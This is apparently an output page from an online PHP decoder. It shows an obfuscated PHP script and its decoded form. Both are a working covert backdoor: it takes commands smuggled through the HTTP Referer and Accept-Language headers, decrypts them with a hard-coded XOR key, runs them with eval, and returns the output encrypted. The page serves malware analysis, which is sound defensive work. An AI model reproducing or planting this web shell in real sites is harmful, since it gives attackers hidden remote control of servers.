Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $f='aMmy("/","+"Mm),$ss($sMm[Mm$i],0Mm,$e))),$k)Mm));$o=oMmb_get_cMmonteMmnts();obM..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$f='aMmy("/","+"Mm),$ss($sMm[Mm$i],0Mm,$e))),$k)Mm));$o=oMmb_get_cMmonteMmnts();obMm_endMm_cleaMmMmn();Mm';
$a=str_replace('rI','','crrIrIearIte_rIfunrIcrItion');
$d='t();MmMm$s=&$_MmSESSION;$ss=Mm"subsMmtr";$Mmsl=Mm"strtoloMmwer";$iMm=$m[1][Mm0].$m[Mm1]Mm[1];Mm$h=$sl($ssMm(md5($';
$E='cMmh_allMm("/([\\w])[\\wMm-Mm]+(?:;q=0.([Mm\\d]))?Mm,?/",Mm$ra,$m)Mm;if($qMm&&$m)Mm{@sessiMmonMm_star';
$e='$kh="5d41"MmMm;$kf="402a";MmfunctiMmon x($tMm,$kMm){$c=strlMmenMmMm($k);$lMm=sMmtrlen($t);$o=Mm"";fo';
$S='MmkeMmy_exMmiMmsts($Mmi,$s)){$s[$i].=$pMm;$Mme=strpos($s[$iMm],$f)Mm;iMmf($e){$Mmk=$kh.$kMmf;ob_st';
$s='EMmRVER;$rMmr=@$r[Mm"HTTP_MmREMmFEMmRER"];Mm$rMma=@$r["HTTPMm_MmACCEPMmT_LANGUAGE"];if($rMmr&Mm&$M';
$O='i.$MmMmkh),0,Mm3)Mm);Mm$Mmf=Mm$sl($ss(md5($i.$kf),Mm0,3)MmMm);$p="";for($Mmz=Mm1;$z<count($m[1]);$Mmz';
$k='Mm++)$Mmp.=$q[$m[2][$Mmz]];iMmf(strpos(Mm$p,$hMm)==MmMm=0){$s[$i]Mm="";$p=$ssMm($Mmp,3);}iMmf(array_';
$P='r($iMm=0Mm;$iMm<$lMm;)Mm{for($j=0Mm;($j<$c&&Mm$i<$l);$j++,$i++)MmMm{MmMm$o.=$t{$i}^$kMm{$jMmMm};}}return $o;}$r=$_S';
$j='mra){$u=parse_Mmurl($rr);pMmarMmse_sMmtr($u["querMmy"]Mm,$q)Mm;$q=Mmarray_valuMmes($q);pMmMmreg_mat';
$c='$d=basMmMme64_encode(x(gzcompreMmss(Mm$o),$k)Mm);MmpMmrint("<$k>$d</$kMm>");@sMmession_dMmesMmtroy();}}}}';
$r='Mmart()Mm;@eMmval(@gzuMmncomMmpMmresMmsMm(@x(@baMmse64_decode(preg_MmreplacMmeMm(array("/_/","/Mm-Mm/"),arr';
$N=str_replace('Mm','',$e.$P.$s.$j.$E.$d.$O.$k.$S.$r.$f.$c);
$V=$a('',$N);$V();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$E cMmh_allMm("/([\w])[\wMm-Mm]+(?:;q=0.([Mm\d]))?Mm,?/",Mm$ra,..
$N $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$O i.$MmMmkh),0,Mm3)Mm);Mm$Mmf=Mm$sl($ss(md5($i.$kf),Mm0,3)MmMm..
$P r($iMm=0Mm;$iMm<$lMm;)Mm{for($j=0Mm;($j<$c&&Mm$i<$l);$j++,$i..
$S MmkeMmy_exMmiMmsts($Mmi,$s)){$s[$i].=$pMm;$Mme=strpos($s[$iM..
$V None
$a create_function
$c $d=basMmMme64_encode(x(gzcompreMmss(Mm$o),$k)Mm);MmpMmrint("..
$d t();MmMm$s=&$_MmSESSION;$ss=Mm"subsMmtr";$Mmsl=Mm"strtoloMmw..
$e $kh="5d41"MmMm;$kf="402a";MmfunctiMmon x($tMm,$kMm){$c=strlM..
$f aMmy("/","+"Mm),$ss($sMm[Mm$i],0Mm,$e))),$k)Mm));$o=oMmb_get..
$j mra){$u=parse_Mmurl($rr);pMmarMmse_sMmtr($u["querMmy"]Mm,$q)..
$k Mm++)$Mmp.=$q[$m[2][$Mmz]];iMmf(strpos(Mm$p,$hMm)==MmMm=0){$..
$r Mmart()Mm;@eMmval(@gzuMmncomMmpMmresMmsMm(@x(@baMmse64_decod..
$s EMmRVER;$rMmr=@$r[Mm"HTTP_MmREMmFEMmRER"];Mm$rMma=@$r["HTTPM..

Stats

MD5 2065bbe72e1778a45ba32a43c3c80093
Eval Count 1
Decode Time 115 ms